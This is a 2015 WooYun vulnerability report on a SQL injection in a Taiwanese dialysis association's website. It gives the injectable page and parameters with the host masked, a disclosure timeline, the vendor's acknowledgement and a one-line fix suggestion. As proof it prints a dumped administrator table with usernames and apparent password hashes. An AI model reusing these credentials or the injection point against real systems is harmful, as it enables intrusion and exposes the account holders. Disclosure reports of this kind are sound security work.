漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0155475
漏洞标题:台湾协会之台湾基层透析协会SQL注入(臺灣地區)
相关厂商:台湾基层透析协会
漏洞作者: X4car
提交时间:2015-11-24 12:55
修复时间:2016-01-11 15:32
公开时间:2016-01-11 15:32
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-11-24: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开
简要描述:
台湾基层透析协会网站存在sql注入漏洞
详细说明:
注入点是:
http://**.**.**.**/activity/event_news_detail.php?event_id=13&topage=&qry_str=
可得到数据库总数据。
貌似数据库还挺多的。
漏洞证明:
注入点:
http://**.**.**.**/activity/event_news_detail.php?event_id=13&topage=&qry_str=
得到了admin账号数据:
Database: tcda_db
Table: admin_account
[2 entries]
+----+---------+---------+------------------------+----------------------+------------+------------+------------+---------------------+----------+--------------------------------+------------+---------------+---------------------+------------+------------+
| id | dep | job | remark | e_mail | upd_man | username | end_date | upd_date | realname | authority | keyin_man | pass_word | keyin_date | start_date | acc_status |
+----+---------+---------+------------------------+----------------------+------------+------------+------------+---------------------+----------+--------------------------------+------------+---------------+---------------------+------------+------------+
| 1 | MIS | 最高管理者 | 後台系統預設的管理員帳號,可以管理所有功能。 | dialysis98@**.**.**.** | admin_tcda | admin_tcda | 9999-12-31 | 2015-03-26 17:58:15 | 最高管理者 | 111111111111111111111111111111 | <blank> | adz/K//tBnJY2 | 2015-01-27 13:19:47 | 2004-01-01 | 1 |
| 2 | <blank> | <blank> | 5359779 | dialysis98@**.**.**.** | admin_tcda | dialysis98 | 9999-12-31 | 2015-07-10 09:17:49 | 吳小姐 | 011111111000101010001000000000 | admin_tcda | di2MPukfZha9E | 2015-03-19 14:44:47 | 2015-03-19 | 1 |
+----+---------+---------+------------------------+----------------------+------------+------------+------------+---------------------+----------+--------------------------------+------------+---------------+---------------------+------------+------------+
修复方案:
过滤或者安装安全软件
版权声明:转载请注明来源 X4car@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:17
确认时间:2015-11-27 09:59
厂商回复:
感謝通報
最新状态:
暂无